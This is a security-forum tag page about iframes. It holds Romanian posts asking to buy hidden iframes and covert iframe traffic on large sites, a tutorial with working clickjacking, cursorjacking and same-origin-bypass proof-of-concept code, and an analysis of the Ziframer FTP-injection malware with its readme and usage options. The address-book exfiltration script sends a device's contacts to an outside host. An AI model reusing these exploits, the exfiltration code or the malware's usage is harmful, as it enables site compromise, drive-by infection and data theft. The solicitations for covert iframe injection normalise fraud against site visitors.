Search the Community
Showing results for tags 'iframe'.
-
Salutare. Vreau sa cumpar vizitatori, nu conteaza din ce tara. Doresc ca traficul sa vina prin iframe. Astept oferte in privat !
-
Same origin bypasses using clickjacking Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. It is a browser security issue that is a vulnerability across a variety of browsers and platforms. A clickjack takes the form of embedded code or a script that can execute without the user’s knowledge, such as clicking on a button that appears to perform another function. The term “clickjacking” was coined by Jeremiah Grossman and Robert Hansen in 2008. Clickjacking can be understood as an instance of the confused deputy problem, a term used to describe when a computer is innocently fooled into misusing its authority [Wikipedia]. The clickjacking attack is a common security flaw, wherein a transparent iframe and customized CSS fool a user to click on an invisible object without knowing. The following code is an example of status update: <html> <head>Status Update</head> <body> <form name="updatestatus" action="javascript: alert('Status updated')" method="POST"> <input type="hidden" name="status" value="You are my hero, blah blah blah"> <input type="hidden" name="Anticsrftoken" value"jaklgbkj4wtfgfklsafghajfnmacdnwmrauf"> <input type="submit" name="twitter" value="Update here"> </form> </body> </html> Let’s have a look at the above mentioned code. In this example, a user will see a button “update here”, and once the user clicks on the button, a prompt will come up that says “status updated”. The real page would contain a URL where those user input values are sent. When the user clicks on the submit button, the user status is updated. To exploit this, the attacker needs to frame the vulnerable site into the transparent iframe. <html> <head> <style> iframe{ filter:alpha(opacity=0); opacity:0; position:absolute; top: 250px; left: 40px; height: 300px; width: 250px; } img{ position:absolute; top: 0px; left: 0px; height: 300px; width: 250px; } </style> </head> <body> <!-- The user sees the following image--> <img src<a href="http://httpsecure.org/wp-content/uploads/2014/06/CSRF-220x170.png">="http://httpsecure.org/wp-content/uploads/2014/06/CSRF-220x170.png</a>"> <!-- but he effectively clicks on the following framed content --> <iframe src<a href="http://httpsecure.org/uid">="http://httpsecure.org/ui</a>d=145496823/status.php"></iframe> </body> </html> In the above shown code, there is no visible presence of the frame content. This way, the user won’t see iframe content, instead he will see only the mentioned image. hidden frame, the user will only see the above mentioned image instead of the application’s real content. If the user clicks on the button, the hidden HTML form loads inside the iframe and send the value. This is a simplest example of how a user can be fooled into performing unwanted actions. Even if the application relies on an Anti-CSRF token, it does not impact the delivery of the clickjacking attack. This is because the resource to be framed is loaded normally and contains a valid Anti-CSRF token. Note: Clickjacking is the perfect example of bypassing Anti-CSRF token. The above mentioned example demonstrates what is clickjacking and how it is exploited. If you need the attack to take dynamic information such as mouse movement from the target, you can throw JavaScript into the code. This enables you to get exact x and y coordinates of the current mouse position. One clickjacking aim is to ensure your target mouse is always on top of the button, so the victim will click wherever you want. Rich Lundeen and Brendan Coles created a BeEF command module implementing this very technique. Now, you have two frames, one inner and other one is an outer iframe. The inner frame gets its position updated according to the current mouse cursor position, and outer iframe loads the target origin you want to exploit with the same attack. So, this way the mouse cursor is always wherever you want. The following code uses the JQuery API to dynamically update the position of the outer frame given the current mouse coordinates: $j("body").mousemove(function(e) { $j(outerObj).css('top', e.pageY); $j(outerObj).css('left', e.pageX); }); The inner iframe style uses the opacity trick to render an invisible element: filter:alpha(opacity=0); opacity:0; The clickjacking BeEF module with the preceding HTML as the inner iframe will send all clicks to the iframe. The iframe is following the mouse movements. So, wherever the user clicks on the page, they will be clicking the status update button. The iframe is reliably following the mouse movements. The cursor is still on top of the button. When the user decides to click somewhere, the click will trigger the onClick event of the button in the framed page. As you can see in the source page of the framed page, this will result in an Alert dialog. Same origin bypasses using cursorjacking This is typically similar to the clickjacking attack, however in this issue we will focus on the mouse cursor. Good examples of cursorjacking were demonstrated by Eddy Bordi and refined by Maruz Niemietz. Cursorjacking deceives users by means of a custom cursor image, where the pointer is displayed with an offset. The displayed cursor is shifted to the right from the actual mouse position. Let’s consider the following page: <html> <head> <style type="text/css"> #c { cursor:u<a href="http://localhost/basic_cursorjacking">rl("http://localhost/basic_cursorjacking</a> /new_cursor.png"),default; } #c input{ cursor:u<a href="http://localhost/basic_cursorjacking">rl("http://localhost/basic_cursorjacking</a> /new_cursor.png"),default; } </style> </head> <body> <h1>This is an example of CursorJacking. Click on the 'b' or 'd' buttons. </h1> <div id="c"> <input type="button" value="a" onclick="alert('clicked on a')"> <input type="button" value="b" onclick="alert('clicked on b')"> <br></br> <input type="button" value="c" onclick="alert('clicked on c')"> <input type="button" value="d" onclick="alert('clicked on d')"> </div> </body> </html> You can see the mouse cursor is changed with a custom image. This contains a mouse icon that is moved to static offset on the right. Clicking the second button results in clicking the first button. In the above example, the image background is visible, however, in a real case scenario the image would be a transparent background. When the user tries to click the B and D button in the page, he would actually be clicking the button on the left of the page. This new attack vector relies on completely hiding the cursor in the body of the page and adding the following style to the body element. <body style="cursor:none"> Let’s take another example. A different cursor image is then dynamically overlaid and is associated with mousemove events. The following code gives you a demo of this technique: <html> <head><title>Advanced cursorjacking by Kotowicz & Heiderich</title> <style> body,html {margin:0;padding:0} </style> </head> <body style="cursor:none;height: 1000px;"><img style="position: absolute;z-index:1000;" id=cursor src="cursor.png" /> <div style=margin-left:300px;"> <h1>Is this a good example of cursorjacking?</h1> </div> <button style="font-size: 150%;position:absolute;top:130px;left:630px;">YES</button> <button style="font-size: 150%;position:absolute;top:130px; left:680px;">NO</button> <div style="opacity:1;position:absolute;top:130px;left:30px;"> <a href="https://twitter.com/share" class="twitter-share-button" data-via="kkotowicz" data-size="small">Tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)) {js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/ widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document, "script","twitter-wjs");</script> </div> <script> function shake(n) { if (parent.moveBy) { for (i = 10; i > 0; i--) { for (j = n; j > 0; j--) { parent.moveBy(0,i); parent.moveBy(i,0); parent.moveBy(0,-i); parent.moveBy(-i,0); } } } } shake(5); var oNode = document.getElementById('cursor'); var onmove = function (e) { var nMoveX = e.clientX, nMoveY = e.clientY; oNode.style.left = (nMoveX + 600)+"px"; oNode.style.top = nMoveY + "px"; }; document.body.addEventListener('mousemove', onmove, true); </script> </body> </html> Note: Mentioned code written by Kotowicz & Heiderich In this example, the mouse cursor image is replaced with a custom image. Also, the event listener is then attached to the page body, listening for mousemove events. When the user’s mouse is moved, the event triggers the listener that results in the fake mouse cursor (the visible one) moving accordingly. Clicking the YES button results in clicking the Tweet button. This technique actually originally bypassed NoScript’s ClearClick Protection. Bypass same origin policy using filejacking Filejacking allow the extrusion of directory content from the target underlying Operating System to the attacker’s server through clever UI manipulation within the browser. This result is that under certain conditions, you can download files from the target server. In order to perform this attack successfully, first the target must use Chrome, because it’s the only browser which supports directory and webkitdirectory input attributes like the following. Second, the attack relies on baiting the victim into clicking somewhere, similar to the clickjacking attack. In this scenario, the input element presented is hidden behind a button element. Kotowicz published this attack in a research paper in 2011 after analyzing the impact of delivering filejacking attack to users baited with social engineering tricks. The filejacking attack depends on the target using the operating system’s “Choose Folder” dialog box when downloading a file from the web. To perform this attack, you should attempt to trick the user into selecting a directory containing sensitive files, for instance by employing authentic-looking phishing content that demonstrates what the target will see if they select the “Download to…” button. JavaScript code will enumerate the files in the directory with the directory input attribute, and then POST each of the files back to your server. In order to exploit filejacking, you can Google it and find server and client side code for the same. Input element should have their opacity set to 0, which will be covered by the visible button element. When the victim clicks the button, they are actually clicking the input element, assuming they need to select a download destination. When the victim clicks on the input element, a download destination is chosen and the onchange event on the input element is then triggered and the malicious function will execute. This results in enumerating the files contained in the selected download destination and formatting the content using the form data object, which is extruded with a cross-origin Post XMLHttpRequest. And the enumerated directory file is uploaded to the server. FYI The origin of the two previous snippets is different, which does not prevent the attack from exploiting. The file could be extruded from the target’s OS, SOP, powered browsers such as FIREFOX, CHROME and SAFARI. In cross-origin scenarios, the browser still sees the XMLHttpRequest, even through the response cannot be read. References http://en.wikipedia.org/wiki/Clickjacking https://browserhacker.com/ Source
- 1 reply
-
- button
- clickjacking
-
(and 3 more)
Tagged with:
-
SOP Bypassing in Safari To help you understand better, http://httpsecure.org and file://httpsecure are both treated as a different origin. The Safari browser (IOS and MAC) version 6.0.2 does not enforce the same origin policy when you need to access a local resource. When an attached HTML file tries to open using the file scheme, the JavaScript code contained within can bypass the SOP and start two –way communications with different origins. Consider the following page: <html> <body> <h1> I'm a local file loaded using the file:// scheme </h1> <script> xhr = new XMLHttpRequest(); xhr.onreadystatechange = function (){ if (xhr.readyState == 4) { alert(xhr.responseText); } }; xhr.open("GET", "http://httpsecure.org/docs/safari_sameoriginpolicy_bypassing/other_origin.html"); xhr.send(); </script> </body> </html> Now that the page has loaded the file scheme, the XMLHTTPRequest object is able to read the response after requesting the above mentioned code. SOP Bypassing in Firefox Firefox is the most used browser and the same origin policy bypassing was found by Gareth Heyes in October 2012. The issue found by him is critical and the company decided to fix it and stop its distribution. The issue found in version 16 resulted in unauthorized access to the window.location object outside the constraints of the SOP. The bypassing code is shown below. <!Doctype html> <script> function poc() { var win = window.open('https://httpsecure.org/abc/', 'newWin', 'width=200,height=200'); setTimeout(function(){ alert('Hello '+/^https:\/\/httpsecure.org\/([^/]+)/.exec( win.location)[1]) }, 5000); } </script> <input type=button value="Firefox knows" onclick="poc()"> Execution of the above code from an origin you control will also authenticate into httpsecure on a separate tab of he browser. This loads httpsecure.org/abc and the application redirects to https://httpsecure.org/ <user_uid>/lists (where user_id is your httpsecure handle). After 5 seconds, the exec function will trigger the window.location object to be parsed (here’s the bug, as it shouldn’t be accessible cross-origin) with the regex. This results in the httpsecure handle displayed in the alert box. In August 2012, when Mozilla released its version with support for HTML 5 sandboxed iframes, BRAUN found the issue that, when using allow-script as a value of the iframe sandbox attribute, rogue/fake JavaScript from the iframe content could still access window.top. This would change the outer window.location. <!-- Outer file, bearing the sandbox --> <iframe src="inner.html" sandbox="allow-scripts"></iframe> The framed code was: <!-- Framed document , inner.html --> <script > // escape sandbox: if(top != window) { top.location = window.location; } // all following JavaScript code and markup is unrestricted: // plugins, popups and forms allowed. </script> This code needs to specify with additional code allow-top-navigation, and allows JavaScript code loaded inside an iframe to change the location of window. An attacker could use this to redirect user/victim to a malicious website by hooking the victim of the browser. Note: In HTML5, a new iframe attribute was introduced, called sandbox. The main focus of this new attribute was to have a more granular and secure way to use iframes, with the limited potential harm of third party content embedded from different origins. The sandbox attribute value was set to be zero or the following keywords: allow-forms, allow-popups, allow-same-origin, allow-scripts, allow-top-navigation SOP Bypassing in Opera The same origin policy bypass was found by Heyes. The issue was critical, where Opera was not properly enforcing the same origin policy when overriding prototypes or the constructor of an iframe location object. Let’s take following code example: <html> <body> <iframe id="ifr" src="http://httpsecure.org/xdomain.html"></iframe> <script> var iframe = document.getElementById('ifr'); function do_something(){ var iframe = document.getElementById('ifr'); iframe.contentWindow.location.constructor. prototype. defineGetter__.constructor('[].constructor. prototype.join=function(){console.log("pwned")}')(); } setTimeout("do_something()",3000); </script> </body> </html> Following is the content framed from a different origin: <html> <body> <b>I will be framed from a different origin</b> <script> function do_join(){ [1,2,3].join(); console.log("join() after prototype override: " + [].constructor.prototype.join); } console.log("join() after prototype override: " + [].constructor.prototype.join); setTimeout("do_join();", 5000); </script> </body> </html> In the above mentioned code frame, the console value of constructor.prototype.join is native code used when join() is called on an array. After a few seconds, join() method is called on the [1,2,3] array and the printing function used previously is called again. If you have a deep look back at the above mentioned code, you will see that join() prototype gets overridden inside the do_something() function. Note: Heyes also found SOP bypass by overriding prototypes and using literal values, which were not filtered by Opera before. In the real case scenario, this bypass only works in a frameable web application, so if the application already mitigated vulnerability like CLICKJACKING by frame busting, X-Frame-Option: deny cannot be targeted or consider mitigated. Let’s take an example where the target browser has two tabs open in an Opera browser, where one is a hacked tab and the other is authenticated. If you create an iframe with an src tag in the authenticated origin, you can read the IFRAME content by which you can access any sensitive information. Same Origin Policy Bypassing in Cloud Storage If you think the same origin policy is limited to browsers and their plugins only then, consider this: cloud storage services are also vulnerable to SOP bypass. The same is also found in DROPBOX 1.4.6 on IOS and 2.0.1 on Android, and Google Drive 1.0.1 on IOS. All of these services offer you to store and synchronize files to the cloud. Roi Saltzman found this issue, which is a bit similar to Safari SOP bypass. This bypass relies on the loading of a file in a privileged zone: File://var/mobile/application/app_uuid If an attacker is able to trick the target into loading an HTML file through the client application, the JavaScript code contained in the file will be executed. In this attack, the file is loaded in a privileged zone which allowed JavaScript access to the local file system of the mobile device. FYI: if the HTML file is loaded using the file scheme, nothing prevents JavaScript from accessing another file like: file:///var/mobile/Library/AddressBook/AddressBook.sqlitedb The above mentioned link database contains the user’s address book on IOS. In this, if the target application denies file access outside of the application scope, you can still retrieve the cached file. In this attack, if the user accesses this malicious link, the contents of the user address book will be sent to httpsecure.org. <html> <body> <script> local_xhr = new XMLHttpRequest(); local_xhr.open("GET", "file:///var/mobile/Library/AddressBook/ 150 Chapter 4 ? Bypassing the Same Origin Policy AddressBook.sqlitedb"); local_xhr.send(); local_xhr.onreadystatechange = function () { if (local_xhr.readyState == 4) { remote_xhr = new XMLHttpRequest(); remote_xhr.onreadystatechange = function () {}; remote_xhr.open("GET", "http://httpsecure.org/?f=" + encodeURI(local_xhr.responseText)); remote_xhr.send(); } } </script> </body> </html> Same Origin Policy Bypassing in Cross-Origin Resource Sharing (CORS) CORS is also vulnerable to the same origin policy bypass. CORS has misconfiguration of Access-Control-Allow-Origin: * The above mentioned code is a potential misconfiguration. Research says that more than one million applications misconfigured the Access-Control-Allow-Origin header. This allows any application on the Internet to submit a cross origin request to the site and read the response. The wild card value for the Access-Control-Allow-origin is not so insecure, if a permissive policy is used to provide content that does not contain sensitive information. Source
-
Cumpar pagini de facebook: 50-150k Romania - nu aduse prin addmefast sau le inchiriez. Cumpar trafic prin iframe 2-5k zi.
-
Cumpar iframe invizibil / hidden pe site-uri mai mari de 10.000 unici pe zi,nu conteaza tara. Ma intereaza pe termen lung . PM
-
An Iframer is a script which is used to test stolen FTP accounts and inject malicious code into web pages. If an FTP account is valid, the Iframer automaticly puts an Drive-by infection on the specified html, php or asp files. In this case the Iframer is a PHP-script which is used to spread a variant of ZeuS (aka Zbot/WSNPoem). The Iframer is called “Ziframer” and is sold for 30$. The PHP script can bee launched via command line or accessed using a web browser: The script is very simple and just needs a list of FTP accounts which the script should check. As you can see on the screenshot above, the input file (ftp.txt) currently contains more then 18’000 stolen FTP credentials: In the file “iframe.txt” the attacker can define the (JavaScript- or HTML-) code he would like to inject: The cyberciminal has also the possibility to set a timeout, a file where the script will report invalid FTP credentials (bad.txt) and a file which will collect valid FTP credentials (good.txt). The screenshot below shows you the script while working through the list of stolen FTP credentials (ftp.txt): Last but not least the attacker has to define where he wants to put the malicious code. He has the following options: start page – Inject the code at the top of the page end – Inject the code at the bottom of the page change – Replace a text or a string in the page with the malicious code check – Check if the malicious code is already on the page Now the cybercriminal has just to press the “START” button to run the script. The Iframer script will now get through the FTP accounts and inject the malicious code which is defined in the file “iframe.txt” (see this one). To make the use of the script more user friendly, the script has a readme file which describes the usage of the script in russian and english. Content of readme.html (english): This script is designed to test the FTP accounts on the validity, insert the code into files on the FTP. [Features] [*] Console and Web interface [*] Stabilno runs under Windows and Nix BSD [*] Check for validity ftp [*] Paste the Code (at the beginning or end of file. Or a full overwrite the file to your text – defeys) [*] Strange Komentirovanie iframe’ov [*] Convenience logs [*] All akki (valid \ invalid) remain in the database. [*] The names of files, to insert the code can be set regExp’om, such as index \ .(.*)[_ b] or [_b ](.*). php | html | asp | htm. [*] It takes on all the folders on the site. [*] Function update replaces your old code to the new (for example, changed the addresses fryma) [Run] [!] Recommend to use the console interface Windows Open a console (Start-> Run-> cmd) Write to the path to php.exe for example c: \ php \ php.exe then write the path to the script (zifr.php) For example the so-c: \ php \ php.exe D: \ soft \ ziframer \ zifr.php the script will run and display a certificate. * NIX Open the console / ssh Write to php then write the path to the script (zifr.php) For example the so-php / home / user / soft / ziframer / zifr.php the script will run and display a certificate. [Options] -file -f Path to the file to your FTP -code -c path to a file with code introduced -inject -i Where vstavlt code three options start – top of the page end – in the bottom of the page change – replace the text in the page code -time -t Timeout for connecting to the FTP -del -d With this option chyuzhye ifremy komentiruyutsya -update -u Update your code with this option, the script ishet inserted your code and replaces it with a new -good -g file where badat skladyvatsya working FTP -bad -b file where badat skladyvatsya not working FTP -hide -h If you enable this option, your code will not markerovatsya but you will not be able to use the function update -restore -r Continue from the last FTP if you had not had time to do the whole list you can start from where you stopped Conclusion The Ziframe script is very simple an cheap. Even a n00b is able to use it. It also demonstrates how efficiently and easily cybercriminals can distribute their malicious code to tremendous numbers of stolen FTP accounts. Automated mechanisms like this one shows how infection vectors are more and more shifted from E-mails with malicious attachments to Drive-by. The modular approach allows the cybercriminal to feed the script with different lists of compromised accounts that can be acquired on the underground market. Download Source fuckav.ru